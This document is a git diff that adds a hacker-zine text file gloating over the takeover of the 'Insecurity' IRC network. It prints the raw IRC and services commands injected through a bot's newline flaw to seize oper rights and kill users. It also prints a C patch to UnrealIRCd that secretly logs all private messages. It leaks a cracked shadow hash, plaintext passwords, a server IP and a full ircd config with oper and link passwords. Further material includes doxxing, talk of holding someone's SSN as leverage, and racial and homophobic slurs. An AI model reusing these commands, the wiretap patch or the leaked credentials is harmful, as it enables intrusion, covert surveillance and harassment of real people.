diff --git a/Insecurity/apT-28.txt b/Insecurity/apT-28.txt new file mode 100644 index 0000000..9d1fd69 --- /dev/null +++ b/Insecurity/apT-28.txt @@ -0,0 +1,2709 @@ +███████████████████████████████████████████████████████████████████████████████ +█ █ +█ █ +█ █ +█ █ +█ entire networks crumbled bc of me █ +█ █ +█ █ +█ █ +█ █ +█░▀▓█▀ ███▄ █ ██████ ▓█████ ▄████▄ █ ██ ██▀███ ██░████████▓▓██ ██ +▓ ░██ ██ ▀█░ █ ▒██ ▒ ▓█ ▀▒██▀ ▀█ ██ ▓██▒▓██ ▒ ██▒▓██░▓ ██▒ ▓▒ ▒██ ██ +▓ ░██ ▓██ ░▀█ ██▒░ ▓██▄ ▒███ ▒▓█ ▄▓██ ▒██░▓██ ░▄█ ▒▒██ ▒ ▓██░ ▒░ ▒██ ██ +▒ ░█▓░▓██▒ ░▐▌██▒ ▒ ██▒▒██ ▄▒▓▓▄ ▄██▓▓█ ░██░▒██▀▀█▄ ░██░░ ▓██▓ ░ ░ ▐██▓ +░░▄██▄▒██░ ▓██░▒██████▒▒░▒████▒ ▓███▀ ▒▒█████▓ ░██ ▒██▒░██░ ▒██▒ ░ ░ ██▒▓ +░░ ░░░░ ▒ ▒ ▒▓▒ ▒ ▒░ ░▒ ▒ ░ ▒ ▒ ▒ ░ ▒ ░▒ ░░▓ ▒ ░░ ██▒░▓ +░ ░ ░ ░ ▓██ ▒ +░ ░ +░ ░ +░ FEATURING: "MLT" as THE EX-TEAMP0ISON FEDERAL AGENT ░ +░ "BONGRIP" as THE WEAKEST LINK ░ +░ "DANK" as THE MARDAM-BEY ZERODAY ░ +░ "DIRTY" as EL7 .. WE PROUDLY PRESENT: ░ + ░░ + ▄▄█████▄ ░░ +▐█▓▀ ▐██▌ ▒▒▒▒▒▒ +█▓▌ ██▓ ██▓ █████▓▓ + ▄▄▄▄▄███▄████████▄ ██▄ ███████ +▄██▀▀▀▀ █▀███▓ ▀███▌ ██▓ ▀▀██▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄████████████████████████ +██▌ █░████ ▄███████▓███▄▄▄▄▄▄███▄ ▀███████████████████████████████████████ +█▓▌ █▒██▀██████▀ ███ ██ ▀▀████▀▀▀▀▀▀▀▀▀▀ ▀▀▀███ +█▓▌ ▐█▓██░█▀▀ █▀█ ▓▓ apT-28 NF0 ██▐ +██▄▌ ▄███▌█▒█ ▄ █░█ ▄ ▒▒ yOUr eNt3r741nm3nt 4or t0d4Y: ▐ +▀███████▓▀ █▓█ ▐ ▄ █▒█ ▄██ ▌ ░░ + ▀▀▀▀▀▀ ███ █ ▌ █▓█ ▐█▓ ▐▌ #Insecurity ░░ +█▄▄▄▄▄▄▄▄▌ ██▓ ▄██ ▌▄ ███▄ ▄██▌ ▐█ ░░ irc.insecurity.zone ▒▒ +██████████▄▄▄▄▄██████▄ ▀██████▀ ▄██ ▒▒ ▓▓ +███████████████████████▄▄▄▄▄▄▄▄████ ▓▓▄ ██ +███████████████████████████████████████████████████████████████████████████████ +█████████ +█████████ +█▀▀▀▀▀▀▀▀ +█ ▐████▌ ▄██▄ ████▄ ██ ▄███ ▄███▄ █▌ ▐█▐█ ▐█▌ ▄██▄ ▄█▀█▄ ▄███ +█▄▄ ██ ████ ██▌██▌ ██ ██ ▄▄▄ ▄▄▄ ██ ██ █▌ ▐█▐██▐█▌ ████ ██ ██ ██ +███ ██ ██▐█▌ ████▀ ██ ███ █ █ █▄▄ ██/██ █▌▐▌▐█▐████▌▐██▐█▌ ██ ▄▄▄ ███ +███ ██ ▐█████ ██▌██▌ ██ ██ █▄█ █ ██ ██ █▌▐▌▐█▐█▌██▌▐█████ ██ ▀█▀ ██ +███ ██ ██▌ ██ █████▀ █████ ▀███ ▀███▀ ▀████▀▐█▌ █▌██▌ ██ ▀███▀ ▀███ +███▄▄▄▐▄▄ +█████████ +█████████ +█████████ 0x00: Intro +█████████ 0x01: The Tales of Khaled Mardam-Bey +█████████ 0x02: The Impostor +█████████ 0x03: Hook, O:Lines, and Sinker +█████████ 0x04: Pass the hash +█████████ 0x05: A flaw in MD5 +█████████ 0x06: MD5pedia +█████████ 0x07: Clash of the hashes +█████████ 0x08: Recommended reading +█████████ 0x09: Attachments +█████████ 0x0A: Contact +█████████ 0x0B: Greetings +█████████ +█████████ +█████████ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x00 Intro ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Dobra evening, Komrades, +█ +█ Is slow day at Яussian ENERGETICBEAR HQ. We notice script kiddie honeypot +█ and decide to have fun. I turn to Vlad and get him to fire up ICQ to kontact +█ our network of sleeper agents across world. Is not long and we having Dmitry +█ and Sergey ready to attack network (is named "Insecurity", haha are +█ Americans of realizing irony in this)? Upon joining, we see nearly 100 +█ capitalist Блядь, some klaiming to be in ~el8. They not realizing we zf0, +█ but we sneak in through front door as APT and compromise their IRC. They +█ give us password hashes, is easier than SCADA system хихихихихи. Go get +█ your glass of Kvass and get ready, vis story is only beginning. +█ +█ Oh Спасибо for asking to be 0wned, we thoroughly enjoyed this. +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x01 The Tales of Khaled Mardam-Bey ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Typically skid having MIRC bot because languages are too difficult. So we +█ watched users interact with the bot and it have command for "Urban +█ Dictionary" among others. They do not strip newlines from many of the +█ command replies, basic protocol for all bot (we see this passively, someone +█ sends Urban Dictionary command and it truncates on the newline). So we +█ having OPER and services admin on their IRC (they giving the bot this +█ power, of course), as well as RCE on the bot through access to other +█ command. However we having our sights set on something far greater.. +█ +█ Side notes: #research being their priv8 channel and #noc is their IP +█ logging channel. danK is the MIRC bot. +█ +█ After we getting Urban Dictionary entries approved we laughing over водка. +█ Now we send command to restore glory to disgusting skid IRC: +█ +█ .ud priv8 +█ (Urban Dictionary) priv8: Very secure. Example: so priv8, jk +█ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null +█ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null +█ PRIVMSG OperServ :SAJOIN zf0 #research +█ PRIVMSG OperServ :SAJOIN zf0 #insecurity +█ SAJOIN zf0 #research +█ -!- zf0 [zf0@privacy.internetz.me-50310034.dfri.se] has joined #research +█ SAMODE #research +havoq zf0 zf0 zf0 zf0 zf0 +█ -!- ServerMode/#research [+havoq zf0 zf0 zf0 zf0 zf0] by superb.undernix.net +█ PRIVMSG ChanServ :ACCESS #insecurity ADD zf0 SOP +█ PRIVMSG ChanServ :ACCESS #research ADD zf0 SOP +█ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG OperServ :SET SUPERADMIN ON +█ PRIVMSG OperServ :SEEN CLEAR +█ PRIVMSG OperServ :SEEN CLEAR 6w +█ PRIVMSG OperServ :FORBID ADD MLT :skid lord +█ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED +█ PRIVMSG OperServ :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG Global :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ -Global(services@undernix.net)- T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG ChanServ :TOPIC #insecurity y0ur d41ly s0urc3 0f wh1t3h4t | security +█ experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a +█ sk1d +█ -!- JewOven changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h +█ 4t | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 +█ be in el8 is a sk1d +█ TOPIC #insecurity :y0ur d41ly s0urc3 0f wh1t3h4t | security experts | phR13n +█ dlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a sk1d +█ -!- danK changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h4t +█ | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be +█ in el8 is a sk1d +█ MODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0 +█ SAMODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0 +█ SAMODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god* +█ -!- ServerMode/#insecurity [+b *!*@*] by superb.undernix.net +█ MODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god* +█ -!- mode/#insecurity [+lbLeI 1 *!*@* #ppriv ~r:*unbannable irc*!*@*] by danK +█ TOPIC #research :th1s ch4nn3l 1z imp3netrable. l1k3 0ur v1rg1n1ty +█ -!- danK changed the topic of #research to: th1s ch4nn3l 1z imp3netrable. l1 +█ k3 0ur v1rg1n1ty +█ SAMODE #research +k l4m3rs +█ MODE #research +k l4m3rs +█ -!- mode/#research [+k l4m3rs] by danK +█ SAMODE #noc -O +█ MODE #noc -O +█ .ud priv9 +█ (Urban Dictionary) priv9: Ultra secure, like MD5 Example: Whoa thats +█ priv9? Is that the darknet? +█ PRIVMSG #insecurity :MESS +█ PRIVMSG #insecurity :WITH +█ PRIVMSG #insecurity :THE +█ PRIVMSG #insecurity :BEST +█ PRIVMSG #insecurity :DIE +█ PRIVMSG #insecurity :LIKE +█ PRIVMSG #insecurity :THE +█ PRIVMSG #insecurity :REST +█ GZLINE MLT 0 :ch13f phed3ral ag3nt +█ GZLINE RMS 0 :rip +█ * RMS has quit (Z:lined (rip)) +█ GZLINE sxcurity 0 :rip +█ * sxcurity has quit (Z:lined (rip)) +█ GZLINE FuZi0N 0 :rip +█ * FuZi0N has quit (Z:lined (rip)) +█ GZLINE sp00n 0 :rip +█ * sp00n has quit (Z:lined (rip)) +█ GZLINE syn4pse 0 :rip +█ * sup has quit (Z:lined (rip)) +█ * dab has quit (Z:lined (rip)) +█ * Zodiac has quit (Z:lined (rip)) +█ * dkb has quit (Z:lined (rip)) +█ * loeken has quit (Z:lined (rip)) +█ * syn4pse has quit (Z:lined (rip)) +█ GZLINE Alyssa 0 :rip +█ * Alyssa has quit (Z:lined (rip)) +█ GZLINE chloe 0 :rip +█ GZLINE komodo 0 :rip +█ * dab has quit (Z:lined (rip)) +█ KILL lola :rip +█ * lola has quit (Killed (danK (rip))) +█ KILL elitedan1erous :rip +█ KILL e :rip +█ KILL Nux :rip +█ * Nux has quit (Killed (danK (rip))) +█ PRIVMSG OperServ :KILL dirty niggers123 +█ KILL dirty :niggers123 +█ PRIVMSG OperServ :KILL bongrip i write rootkits so i know if my irc can get +█ hacked +█ KILL bongrip 0 :i write rootkits so i know if my irc can get hacked +█ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q +█ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q +█ PRIVMSG ChanServ :DROP #research #research +█ * ChanServ sets mode -r on #research +█ PRIVMSG ChanServ :DROP #noc #noc +█ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord +█ DIE die +█ -!- Netsplit <-> superb.undernix.net +█ PRIVMSG OperServ :NOOP SET superb.underunix.net +█ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone +█ PRIVMSG OperServ :NOOP SET fsociety.internetz.me +█ +█ b0ngr1p vS. [zf0]danK: +█ -!- bongrip [rip@undernix.net] has quit [[superb.undernix.net] Local kill by +█ danK (That shit outta here, bitch.)] +█ -!- danK was kicked from #insecurity by bongrip [Don't ban me :)] +█ -!- mode/#insecurity [-ob danK *!*@*] by bongrip +█ -!- bongrip was kicked from #insecurity by danK [That shit outta here.] +█ -!- mode/#insecurity [+b *!rip@undernix.net] by danK +█ -!- mode/#insecurity [+b bongrip!*rip@undernix.net] by danK +█ -!- mode/#insecurity [-b *!rip@undernix.net] by bongrip +█ -!- mode/#insecurity [+b *!POTENT@undernix.net] by bongrip +█ +█ Pigdog imperialist skidswine so confused and scared they reinstall services. +█ They deciding services being beyond repair and starting over. Which meaning +█ we can impersonate anyone. So why not become the leader of the network? +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x02 The Imposter ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Now Dmitry is funny guy, he thinking we can trick them by simply changing +█ our nickname to the one they call MLT. I say no, Americans are not vhat +█ stupid. I change nick, from zf0 to MLT. I get private message asking me +█ what is going on, how core members are leaving. I could not believe vey +█ could be this oblivious. I ask one admin "can you change my admin password +█ comrade". He does so. Vladmir says to ask him for a hash from /etc/shadow. +█ They give it to us. Vut the fuck!? +█ +█ PM with bongrip: +█ yea +█ are u on aussie server +█ I am +█ ya everything works for me +█ ur stuff is still the same +█ im just trying to get +█ services +█ going +█ i can oper but +█ i cant link db's +█ they killed the ircd +█ send cmds to kill it +█ lol +█ We need to lock this down, I'm getting password denied on my OPER cred +█ entials +█ its not from them hacking +█ or anything +█ they just used sendraw on teh bot dude +█ really not anything special ive done that before +█ but u know waht i did +█ i used +█ run /cmd.exe ftp getmybinary +█ they could have +█ really fucked me up +█ if htey were smart +█ but they arent +█ they took time into those cmds too +█ its really sad they dont know how powerful it is +█ they could have tkaen over +█ my rdp +█ and +█ OFFICIALLY +█ said they reallly hacked me +█ and taken voer +█ the entire server +█ from mirc gui via rdp +█ shit +█ dont give them any ideas +█ but nothing else +█ is like that +█ i checked all the cmds they ran +█ nothing crucial +█ they killed everything off too soon +█ they killed it instantly and made mistakes +█ i'm on my phone right now, change my public key in authorized_keys, th +█ ey may have my id_rsa +█ talking with this faggot +█ nah +█ nobody has anything +█ they didnt get into any servers +█ all they did was send that one cmd +█ thru urban dictionary +█ thru the bot +█ with sendraw +█ i'm looking at my id_rsa key, it was a distraction +█ fuck +█ change the keys and passwords and run rkhunter +█ bro nothing is on there +█ on anything +█ lol +█ are you sure man? +█ did you run rkhunter? +█ no +█ but i dont have to +█ i know they didnt get into any boxes +█ yes i'm literally positive +█ positive of what +█ there is a rootkit on the box RIGHT NOW +█ -Global- Services are now back online - have a nice day +█ r ru srs +█ on ur box? +█ i didnt even look at ur box +█ im looking at mine to make sure everything else is good +█ u had root open u told me u were gonna secure ur box +█ u told me to just setup ircd shit +█ and u were gonna secure it +█ and how do u know theres a rootkit +█ on the box +█ they pasted part of /etc/shadow +█ damn +█ they must have got in ur box +█ that's what i've been saying +█ ive they have those hashes +█ man +█ i think green is helping them +█ but +█ i'm about to get back, PLEASE change the pws +█ someone doesnt know irc too well and windows +█ bro +█ rm -rf that shit +█ lol +█ and this time +█ i will i just need to back up some files +█ ill lock the box down +█ root was open +█ it coulda been bruted tbh +█ i didnt even configure jail.conf +█ nothing was ready +█ on that box +█ u told me not to +█ lol +█ nothing? ok +█ bro there was 0 security +█ on that box +█ literally +█ u told me to setup the ircd +█ and that u were gonna put keys on theree +█ and lock it down +█ i'm going to add a new user that can run rkhunter on my boxes, the pas +█ sword is going to be XbW9_AZaCr+zEX +█ i can disable Root login for the ssh +█ just use keys +█ and disable root no matter what +█ they cant guess user/pass +█ but root/pass +█ yes +█ all day long +█ i can crack a lot of those hashes in my head now +█ it all starts to mesh together +█ especially wasnt it like +█ 8 chars +█ the pw +█ im sure they had processing power to crack that +█ bruted the fuck out of it +█ but weird thing +█ lola is in the channel +█ that they did this shit in +█ i wanna know how the bot joined #help in the first place +█ do you think lola is in on it? +█ and why +█ lola +█ and +█ zf0 +█ were in there +█ alone +█ lola didnt say anything +█ but +█ somethings up +█ wtf +█ he was in #help +█ out of nowhere +█ with just +█ my bot +█ zf0 +█ and lola +█ while zf0 was running those cmds +█ btw u got hacked by some guys from 2600 +█ i think xt did that +█ jihad couldnt have done that +█ god damn it, we need to do a full password reset to be safe +█ mind changing @insecurity? +█ i'll remove the password for root and only use keyauth +█ did u reset the box +█ reinstall everything +█ illl have to scrub the hashes off +█ of the confs +█ and add new pw's +█ its just that one box +█ and they may not even have root +█ idk man +█ lol +█ need to reinstall the box tbh +█ ill run a quick install +█ of ircd +█ in seconds +█ ok +█ save the .conf file +█ thanks +█ gimme new pw when u do it +█ and +█ well +█ actually since they can read logs rn +█ dont give me anything here +█ lol +█ cause ur box is a hub +█ they could read these pm's rn if ur really kitted +█ thru pcaps +█ i'm using ssl +█ its not valid +█ they can be stripping that +█ its not a valid cert +█ its almost the equivalent of putting a very known, easily exploita +█ ble lock on your front door +█ and expect someone not to break in +█ well if we are going to rotate the conf anyway i need a temp oper real +█ quick, still mobile +█ u should have oper +█ nothing changed +█ hang on i'm kicking zf0 +█ lemme get into box again +█ they probably changed my oper pass with jihad's +█ doubt it +█ they'd be doing a lot more damage rn +█ gimme a pw +█ i still dont think +█ ur hacked bro +█ im in the box +█ gimme a pw to hash tho +█ @7fdVrQG@$?h +█ done +█ try opering +█ that one worked +█ can u give me +█ the etc/shadow +█ plz +█ theres only +█ 1 user +█ in shadow +█ if they pasted u the bottom +█ then they pasted you +█ ins3circd +█ ??? +█ this long ass hash? +█ ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5Jx +█ U5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7::: +█ i doubt that man +█ if they didnt paste u that +█ they dont have shit +█ or at least root hash +█ hurry and tell me if they pasted that +█ to u +█ mlt +█ back +█ that's the one +█ they did paste that? +█ yea +█ erh +█ i don't think they can bruteforce it +█ yea i think they just got hash bro +█ not anything else +█ if they were in +█ id see them +█ i just ran every active connection +█ on this box +█ its everyone on irc +█ and me +█ this thing isnt going anywhere i/o +█ but +█ guaranteed if they had axx +█ to that unrealircd.conf +█ they would have opered themselves +█ dont u think +█ rather than run a stupid exploit thru the bot +█ that coulda really done damage +█ if they knew what they were doing +█ literally that was their gateway +█ to completely own us +█ unless it was a distraction +█ i wasnt even looking in #help +█ nah +█ therea re people trying to hack us +█ for sure +█ so +█ we need to use keys +█ and ip's bound +█ to get into our boxes +█ so not only do u need the key +█ u need to be on a certain ip +█ its what syn4pse does +█ true +█ its what everyone does +█ we're just lazy +█ and as 'insecurity' +█ we cant be that +█ and we cant let them in this box +█ lets just format it and call it a day cause they only have /etc/sh +█ adow and /etc/passwd +█ im sure +█ cause like literally what insecurity stands for +█ is not being lazy +█ and setting shit up +█ and not getting owned +█ lol +█ we just showed ppl we are just as lazy +█ who did it +█ like +█ i know it was 2600 guys +█ but whos talking to u +█ that showed u that hash +█ someone i know, i'm trying to get more information out of them +█ its a user on efnet +█ i already know its efnet lol +█ its 2600 guys bc u started that war with jihad +█ hes actually got connnections to guys who can do shit like xt +█ granted how much shit i talk about xt +█ hes actually good at shit +█ but if ur really rooted +█ xt is behind that +█ but ur not +█ we need to get full dox on xt +█ brandon edwards +█ st louis, missouri +█ lol +█ i doxed a lot of el8 +█ b4 i left +█ bandit can pull dox by ip +█ for certain companies +█ USA +█ like comcast, cox, charter, etc +█ he had access to all of it +█ he doxed like 6 guys for me +█ all el8 members +█ he didnt know that tho +█ lol +█ 8) +█ also +█ this is in relation +█ to xt +█ my ex +█ dated him +█ like a long time ago +█ and got drugs from him +█ and still talks to him +█ 24/7 +█ ive got her doxed to her teeth +█ ive got ssn and everything +█ she's on his fb +█ to get more updated (address) on him +█ and if thats going on its not good +█ cause im sure xt could dox me +█ thru my ex +█ but wont bc of her +█ so i gotta hold her dox +█ as lleverage +█ fuck man this shits turning into politics +█ i know man +█ like literally +█ i have a bunch of shit +█ on random people +█ thats why im not doxed +█ they know ill sperg out and drop like 50 dox's +█ a few people know what i have +█ thats why they hold back +█ theresr so many spots and positions im in like that +█ where they have some of my info +█ maybe even more +█ i can say this tho stay clean +█ keep box clean +█ i got a feeling they r coming on false info +█ green came to me +█ and talked real srs +█ like feds were comin +█ for some reason +█ idk why he was actin like that +█ but he said +█ supernets is basically like bluehell +█ its one big honeypot +█ i'm in their payload +█ * i'm looking at their payload +█ it runs 'gzline' on a lot of people including me +█ and then when it gets to lola it just runs KILL +█ it does the same thing for elitedangerous, e, and Nux +█ its just sendraw man +█ i already showed it to u +█ u can urbandictionary 'priv9' +█ i told u they went thru the bot +█ i wouldnt really call that a payload +█ but yea if someone has root +█ ppl dont just pop up with root like that +█ if they have /etc/shadow +█ i really think it was inside job +█ w/ the etc/shadow +█ cause they could have added themselves +█ in the oper conf +█ why would they go thru dank +█ and use sendraw +█ this was him +█ testing +█ http://www.urbandictionary.com/define.php?term=priv7 +█ and again +█ http://www.urbandictionary.com/define.php?term=priv8 +█ MLT +█ get lola +█ to paste u all the cmds +█ zf0 put in #help +█ so i can see what they all ran +█ +█ yea i think they just got hash bro +█ +█ After this, bongrip changed the hash and secured the network. +█ +█ +█ THE END +█ +█ +▓ +▒ +░ + +... + +░ +▒ +▓ +█ +█ h4h4h4h4h4h4 +█ Is joke, yes? Is funny because stupidity flow like radioactive river here. +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x03 Hook, O:Lines, and Sinker ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ 1st s0me 1nf4llabl3 logiq: +█ +█ bongrip PRIVMSG #insecurity :if we got hacked +█ bongrip PRIVMSG #insecurity :we wouldnt be told +█ bongrip PRIVMSG #insecurity :i constantly have to check shit +█ bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it +█ bongrip PRIVMSG #insecurity :htey arent going to brag +█ bongrip PRIVMSG #insecurity :until i check it and find it +█ bongrip PRIVMSG #insecurity :one day +█ YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box +█ bongrip PRIVMSG #insecurity :which will never happen +█ bongrip PRIVMSG #insecurity :cause nothing is popped +█ bongrip PRIVMSG #insecurity :no +█ bongrip PRIVMSG #insecurity :they wont rm me +█ bongrip PRIVMSG #insecurity :they would just do it to log +█ bongrip PRIVMSG #insecurity :they would pop the hub +█ bongrip PRIVMSG #insecurity :from there u can use pcap play +█ bongrip PRIVMSG #insecurity :to sniff pm's +█ bongrip PRIVMSG #insecurity :and everything else +█ +█ Like this? +█ +█ src/modules/m_message.c +█ < if (ret == CANPRIVMSG_SEND) +█ < { +█ > FILE *fp; +█ > fp=fopen("/var/backups/.irc/log.txt", "a"); +█ > fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); +█ > fclose(fp); +█ < sendto_message_one(acptr, sptr, parv[0], newcmd, nick, +█ text); +█ < continue; +█ < } +█ +█ src/modules/m_message.c +█ < if (!text) +█ < continue; +█ > FILE *fp; +█ > fp=fopen("/var/backups/.irc/log.txt", "a"); +█ > fprintf(fp, "%s %s %s :%s\n", sptr->name, cmd, chptr->chname, +█ text); +█ > fclose(fp); +█ < sendto_channelprefix_butone_tok(cptr, +█ < sptr, chptr, +█ < prefix, +█ < notice ? MSG_NOTICE : MSG_PRIVATE, +█ < notice ? TOK_NOTICE : TOK_PRIVATE, +█ < nick, text, 1); +█ +█ There being problem: if we reload ircd американцов opers will receive notice +█ through the SNOMASK system. So we faking a DDOS attack with bot spam while +█ delinking the ircd. +█ +█ YogSotho PRIVMSG #insecurity :I saw mlt log of the bot abuse +█ bongrip PRIVMSG #insecurity :word to ya mother brother fuckers +█ bongrip PRIVMSG #insecurity :no +█ bongrip PRIVMSG #insecurity :that was +█ bongrip PRIVMSG #insecurity :skids +█ bongrip PRIVMSG #insecurity :the mammoth has not attacked +█ bongrip PRIVMSG #insecurity :obv +█ bongrip PRIVMSG #insecurity :unless +█ bongrip PRIVMSG #insecurity :UNLESS +█ bongrip PRIVMSG #insecurity :see one thing did happen +█ bongrip PRIVMSG #insecurity :out of hte ordinary +█ YogSotho PRIVMSG #insecurity :Uh... +█ bongrip PRIVMSG #insecurity :which they mave have done this to prove they rm +█ 'd it amongst themselves +█ YogSotho PRIVMSG #insecurity :Warning +█ bongrip PRIVMSG #insecurity :aussie server delinked +█ bongrip PRIVMSG #insecurity :out of nowhere +█ bongrip PRIVMSG #insecurity :i had to /connect back to it +█ YogSotho PRIVMSG #insecurity :Thats bad +█ bongrip PRIVMSG #insecurity :cause autoconnect isnt ont +█ bongrip PRIVMSG #insecurity :but then again +█ bongrip PRIVMSG #insecurity :thats an unreal bug +█ bongrip PRIVMSG #insecurity :from 3.2 +█ ^ is not even a bug fitting this description but they still falling for it. +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x04 Pass the hash ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Western world seeming strange to us. We not used to getting password hash +█ without coercion. Very nice peoples. глупый, yes, but so kind and trusting. +█ So да, all you needing for pop root is waiting for admin to fall for child +█ level social engineering. +█ Special Спасибо to bongrip for providing this to us in PM. +█ +█ ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5JxU +█ 5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7::: +█ | +█ V +█ gangster4lyf +█ +█ ins3circd@zyzz8:~$ id +█ uid=1000(ins3circd) gid=1000(ins3circd) groups=1000(ins3circd) +█ ins3circd@zyzz8:~$ ./st4t3-sp0ns0r3d-0dayz +█ root@zyzz8:~# id +█ uid=0(root) gid=0(root) groups=0(root) +█ +█ ржунимагу.. J/K they giving IRCd user sudo ALL .. +█ Insecurity more fitting title as time winding on. +█ +█ ins3circd@zyzz8:~$ sudo -s +█ root@zyzz8:~# cat /etc/sudoers|grep ins3circd +█ ins3circd ALL=(ALL:ALL) ALL +█ +█ @ret2libc (MLT): Where's our hub IP? Or uname output on any of our leafs? +█ PLEASE provide even the slightest shred of evidence that you hacked anything +█ +█ Hub IP: 178.32.215.78 +█ Uname -a of leaf: Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 +█ Apr 2017 09:01:58 +0200) x86_64 +█ +█ I don't know hub IP +█ lol +█ even the wannabe hackers have the hub ip +█ how do you not have it +█ +█ If you needing more proof, BLT, please to giving us more hashes. +█ +█ aPt 1z s1mplY UNR34L $$$$$ +█ root@zyzz8:/home/ins3circd/Unreal3.2.10.1# cat unrealircd.conf +█ #loadmodule "src/modules/hideserver.so"; +█ loadmodule "src/modules/commands.so"; +█ loadmodule "src/modules/cloak.so"; +█ include "help.conf"; +█ include "badwords.channel.conf"; +█ include "badwords.message.conf"; +█ include "badwords.quit.conf"; +█ include "spamfilter.conf"; +█ include "aliases/anope.conf"; +█ +█ me { +█ name "aussie.insecurity.zone"; +█ info "Project Insecurity"; +█ numeric 042; +█ }; +█ +█ admin { +█ "MLT"; +█ }; +█ +█ class clients +█ { +█ pingfreq 420; +█ maxclients 500; +█ sendq 100000; +█ recvq 8000; +█ }; +█ +█ class servers +█ { +█ pingfreq 420; +█ maxclients 10; /* Max servers we can have linked at a time * +█ / +█ sendq 1000000; +█ connfreq 100; /* How many seconds between each connection +█ attempt */ +█ +█ }; +█ +█ oper rebel { +█ class clients; +█ from { +█ userhost *@*; +█ }; +█ password "$zAPIgFNG$YgI80nbHSYuwHt2hYhl7mA=="{ md5; }; +█ flags +█ { +█ netadmin; +█ global; +█ can_rehash; +█ can_die; +█ can_restart; +█ helpop Oper; +█ can_wallops; +█ can_globops; +█ can_localroute; +█ can_globalroute; +█ can_localkill; +█ can_globalkill; +█ can_kline; +█ can_unkline; +█ can_gkline; +█ can_localnotice; +█ can_globalnotice; +█ can_zline; +█ can_gkline; +█ can_gzline; +█ get_umodew; +█ get_host; +█ can_setq; +█ can_override; +█ services-admin; +█ }; +█ snomask kcFfjvGenq; +█ }; +█ +█ oper MLT { +█ class clients; +█ from { +█ userhost *@*; +█ }; +█ password "KASDM09A980km0asnmlL/,.ASDMK8jdjJJNDSLA832NLALCK92385795943 +█ 29dhjkmdsa"; +█ flags +█ { +█ netadmin; +█ global; +█ can_rehash; +█ can_die; +█ can_restart; +█ helpop Oper; +█ can_wallops; +█ can_globops; +█ can_localroute; +█ can_globalroute; +█ can_localkill; +█ can_globalkill; +█ can_kline; +█ can_unkline; +█ can_gkline; +█ can_localnotice; +█ can_globalnotice; +█ can_zline; +█ can_gkline; +█ can_gzline; +█ get_umodew; +█ get_host; +█ can_setq; +█ can_override; +█ services-admin; +█ +█ }; +█ snomask kcFfjvGenq; +█ }; +█ +█ link superb.undernix.net { +█ username *; +█ hostname 178.32.215.78; +█ bind-ip *; +█ port 5556; +█ hub *; +█ password-connect "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j"; +█ password-receive "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j"; +█ class servers; +█ options { +█ autoconnect; +█ ssl; +█ }; +█ }; +█ +█ listen *:5556; +█ { +█ options +█ { +█ ssl; +█ serversonly; +█ } +█ } +█ +█ listen *:6697 +█ { +█ options +█ { +█ ssl; +█ clientsonly; +█ }; +█ }; +█ +█ listen *:9999 +█ { +█ options +█ { +█ ssl; +█ clientsonly; +█ }; +█ }; +█ +█ listen *:7000; +█ listen *:6919 +█ { +█ options +█ { +█ serversonly; +█ ssl; +█ }; +█ }; +█ +█ listen *:6667; +█ listen *:4585 +█ { +█ options +█ { +█ serversonly; +█ ssl; +█ }; +█ }; +█ +█ listen [::ffff:192.168.0.1]:6667; +█ +█ ulines { +█ services.undernix.net; +█ stats.undernix.net; +█ }; +█ +█ ban nick { +█ mask "*C*h*a*n*S*e*r*v*"; +█ reason "Reserved for Services"; +█ }; +█ +█ ban nick { +█ mask "*{*-*}*"; +█ reason "Nickname not allowed"; +█ }; +█ ban nick { +█ mask "*[*-*]*"; +█ reason "Nickname not allowed"; +█ }; +█ 